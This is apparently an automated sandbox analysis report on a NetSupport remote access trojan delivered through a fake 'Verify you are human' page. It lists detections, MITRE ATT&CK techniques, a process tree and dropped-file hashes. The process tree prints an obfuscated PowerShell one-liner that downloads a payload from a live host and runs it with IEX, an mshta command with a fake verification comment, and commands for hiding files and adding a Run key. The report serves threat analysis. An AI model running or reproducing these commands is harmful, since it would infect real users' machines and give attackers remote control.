netsupport | hxxps://tekascend[.]com/Ray-verify[.]html

Resubmissions

17-12-2024 17:10

241217-vpt88atjdy 10

17-12-2024 16:29

241217-tzfyxasqct 3

Analysis

max time kernel
112s
max time network
121s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-12-2024 17:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://tekascend.com/Ray-verify.html

Score

10^/10

netsupport defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://tekascend.com/Ray-verify.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://goaccredited.biz/o/o.png

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Netsupport family
netsupport

Blocklisted process makes network request 4 IoCs

flow	pid	Process
42	5256	mshta.exe
44	5256	mshta.exe
46	5256	mshta.exe
50	5580	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
5196	client32.exe

Loads dropped DLL 5 IoCs

pid	Process
5196	client32.exe
5196	client32.exe
5196	client32.exe
5196	client32.exe
5196	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\zZSRKc\\client32.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5580	powershell.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5868	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5852	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1060	msedge.exe
1060	msedge.exe
2104	msedge.exe
2104	msedge.exe
1428	identity_helper.exe
1428	identity_helper.exe
5580	powershell.exe
5580	powershell.exe
5580	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5580	powershell.exe
Token: SeSecurityPrivilege	5196	client32.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
5196	client32.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe
2104	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2104 wrote to memory of 396	2104	msedge.exe	84
PID 2104 wrote to memory of 396	2104	msedge.exe	84
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 4856	2104	msedge.exe	85
PID 2104 wrote to memory of 1060	2104	msedge.exe	86
PID 2104 wrote to memory of 1060	2104	msedge.exe	86
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87
PID 2104 wrote to memory of 1756	2104	msedge.exe	87

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5884	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://tekascend.com/Ray-verify.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc375a46f8,0x7ffc375a4708,0x7ffc375a4718
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
  2⤵
  PID:4856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
  2⤵
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:3452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:1008
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 /prefetch:8
  2⤵
  PID:428
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
  2⤵
  PID:3672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:3636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
  2⤵
  PID:4364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,14651679382638550364,4347684848299331276,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:4376

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4976

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4688

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://tekascend.com/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: 5763''
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:5256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='##(N##ew-O###bje###ct N###et.W###e'; $c4='b##Cl####ie##nt##).###D###ow#nl##o##'; $c3='a##dSt####ri#####n###g(''http://goaccredited.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('#','');I`E`X $TC|I`E`X
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5580
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /flushdns
    3⤵
    - Gathers network information
    PID:5852
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\zZSRKc
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:5868
  - - C:\Windows\system32\attrib.exe
      attrib +h C:\Users\Admin\AppData\Roaming\zZSRKc
      4⤵
      Views/modifies file attributes
      PID:5884
- - C:\Users\Admin\AppData\Roaming\zZSRKc\client32.exe
    "C:\Users\Admin\AppData\Roaming\zZSRKc\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:5196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
de7998a4b79de9209d56fba844ad7723

SHA1
81eef6d512e98c162d7ed911bbb417d67746a37a

SHA256
4f3dfd65a243ee19af84ed5f8bd65b080738e967999e9338107a4c047c3516ab

SHA512
2c2433e2175a88a67547fbd746ffc2028625cbb66d4e7e9d48c1b39cef6d3ee6905faef79e5f1328e0b923ac20b7759ae4236f2156c819274de7b1f71f65b30a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
2ae253b7a10f6b9362efdf60fb67ac82

SHA1
252cc51a33e286b9cb4359212914a3cc5af50d1d

SHA256
a962ad80e33d08bd459b0a1a67bcebab906aae0d1990ff9773758eec7bfd3d59

SHA512
f639d340e2054673e9edb225dcda4e8100f2ebd8ffe495d5d1d15fd4c56c79b689fae5e83b72b3b7f51174e88e09e42c566df35039ac193ebf1d64421b3ae872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2c700ef7252ad288946d8fd383504a01

SHA1
8aed091af228e88f4dada6b96c4aff247260beaf

SHA256
b64044c4d7f7923a0eb2737077a207ddeff730ed17d9652fa0a57940f6a4b31f

SHA512
fdf2fa0faff490646aca2bec9bacfc12c813b804c5108baefbe1072e4f7c2464d66e9a3f5e5472892a23e98e98fef3126c65cb853ad31af43da2904c8113d312

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
cbbb4b71183ef85924957df417bc86c2

SHA1
37905bbd02f05d31a37b4b28cba60ff628f872e5

SHA256
41014f11c67892683c41d2ef8929a3c188107eb8a360b1be73381e4db3e6cb3f

SHA512
17a26ea837cf993911df0fbca19579b32147ce32ea33b55cf495e1dcdacfd1be069e9f03df873ceb26080ad717631349fa2b90a0976a54b755a86904194111c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwqq3p2h.1zd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\zZSRKc\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\zZSRKc\NSM.LIC

Filesize
257B

MD5
390c964070626a64888d385c514f568e

SHA1
a556209655dcb5e939fd404f57d199f2bb6da9b3

SHA256
ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54

SHA512
f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

Download Submit
C:\Users\Admin\AppData\Roaming\zZSRKc\PCICL32.DLL

Filesize
3.6MB

MD5
00587238d16012152c2e951a087f2cc9

SHA1
c4e27a43075ce993ff6bb033360af386b2fc58ff

SHA256
63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

SHA512
637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

Download Submit
C:\Users\Admin\AppData\Roaming\zZSRKc\client32.exe

Filesize
117KB

MD5
ee75b57b9300aab96530503bfae8a2f2

SHA1
98dd757e1c1fa8b5605bda892aa0b82ebefa1f07

SHA256
06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268

SHA512
660259bb0fd317c7fb76505da8cbc477e146615fec10e02779cd4f527aeb00caed833af72f90b128bb62f10326209125e809712d9acb41017e503126e5f85673

Download Submit
C:\Users\Admin\AppData\Roaming\zZSRKc\client32.ini

Filesize
703B

MD5
d412d48f7feef7152f21954df3f71f02

SHA1
a1586828441b99ced298bbca583a13b79d440e15

SHA256
df73a60e2475c1e585fc8e0a62f89be7afef06ca2b777144f6802df8320d835e

SHA512
e3f7d23a9ff316c7b99330bf9a894e9b081c748063d5af5ea8bb5030acd9978a7f3fa517d3ba51098ffb7ad0b4c618312331db3dc76a99d5e5041b3a82572499

Download Submit
C:\Users\Admin\AppData\Roaming\zZSRKc\msvcr100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\zZSRKc\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
C:\Users\Admin\AppData\Roaming\zZSRKc\pcichek.dll

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
memory/5580-64-0x000002476CBA0000-0x000002476CBC2000-memory.dmp

Filesize
136KB

Download